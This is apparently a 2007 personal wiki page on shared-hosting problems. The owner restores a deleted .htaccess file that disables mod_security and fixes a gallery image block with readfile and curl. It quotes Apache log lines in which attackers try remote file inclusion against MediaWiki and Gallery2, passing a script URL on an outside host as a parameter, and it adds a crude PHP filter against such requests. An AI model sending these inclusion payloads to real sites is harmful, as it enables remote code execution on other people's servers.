Shared Hosting: Difference between revisions
m (→MediaWiki) |
m (→MediaWiki) |
||
Line 32: | Line 32: | ||
I can see the attack is also going against my gallery installation. I would appear they are sending something else other than what shows up in the logs. | I can see the attack is also going against my gallery installation. I would appear they are sending something else other than what shows up in the logs. | ||
I added this to my <code>LocalSettings.php</code> | I added this to my <code>mediawiki/LocalSettings.php</code> and <code>gallery/config.php</code> files. | ||
<geshi lang="php"> | <geshi lang="php"> | ||
//http and https should not be used in any query string | //http and https should not be used in any query string |
Latest revision as of 07:57, 17 October 2007
I use Linksky to host this website, and they provide a reasonable Linux shared hosting solution. The problem with any shared hosting, and especially with PHP, is that you never know when your environment is going to change.
MediaWiki
In my latest what is going to break today?, LinkSky deleted my .htaccess file out of my MediaWiki directory. I went to edit my OS X Tips tips, and i received this 406 error:
Not Acceptable An appropriate representation of the requested resource /wikimedia/index.php could not be found on this server.
How do I know it was deleted? Well, I had this problem before when the SecFilterEngine was first added. I fixed it by changing my .htaccess file. Fortunately, I have aged complete backups of my site. I just had to go to last weeks backup to recover the file. Here's my .htaccess file:
<geshi lang="bash"> php_flag register_globals off SecFilterEngine Off </geshi>
I don't have to disable this everywhere, but in my wiki, I do tend to put lots of nasty commands like /bin/rm
.
The interesting thing is I seem to be under attack from some spammer. I can see exactly when the change was made, because I start returning different error codes before and after.
<geshi lang="Apache Log"> 124.125.17.35 - - [15/Oct/2007:03:07:23 -0500] "GET /wikimedia/index.php?title=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 301 13 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 124.125.17.35 - - [15/Oct/2007:03:07:24 -0500] "GET /wikimedia/index.php/Http://amyru.h18.ru/images/cs.txt%3F HTTP/1.1" 200 9607 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 71.107.243.197 - - [15/Oct/2007:04:26:29 -0500] "GET /gallery/main.php?g2_controller=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 968 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 71.107.243.197 - - [15/Oct/2007:04:26:42 -0500] "GET /gallery/main.php?g2_controller=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 968 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 24.77.215.65 - - [15/Oct/2007:05:16:34 -0500] "GET /wikimedia/index.php?title=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 406 278 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 24.77.215.65 - - [15/Oct/2007:05:16:38 -0500] "GET /wikimedia/index.php?title=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 406 278 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" </geshi>
I can see the attack is also going against my gallery installation. I would appear they are sending something else other than what shows up in the logs.
I added this to my mediawiki/LocalSettings.php
and gallery/config.php
files.
<geshi lang="php">
//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
header('Location: http://' . $_SERVER['SERVER_NAME']); exit;
} </geshi>
Gallery2
The way I always find out is when something that was working suddenly stops. The case today, is my image block on this site's home page. Originally, the block was created with this code:
When it stopped working, I changed it to this:
<geshi lang="php">error_reporting(E_ALL); readfile('http://www.theeggeadventure.com/gallery/main.php?g2_view=imageblock.External&g2_blocks=recentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage&g2_show=none&g2_maxSize=50'); </geshi>
That did not produce any error messages, so I tried this suggestion:
<geshi lang="php">
$ch = curl_init(); $timeout = 5; // set to zero for no timeout curl_setopt ($ch, CURLOPT_URL, 'http://www.theeggeadventure.com/gallery/main.php?g2_view=imageblock.External&g2_blocks=recentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage&g2_show=none&g2_maxSize=50'); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $file_contents = curl_exec($ch); curl_close($ch); echo $file_contents;
</geshi>
Today, this is working, but at some point the web host may disable curl, and then I'll have to find another solution. If I had a more important site, I'd pay for virtual hosting or dedicated hosting. If I had more time and bandwidth, I'd run the server at my home.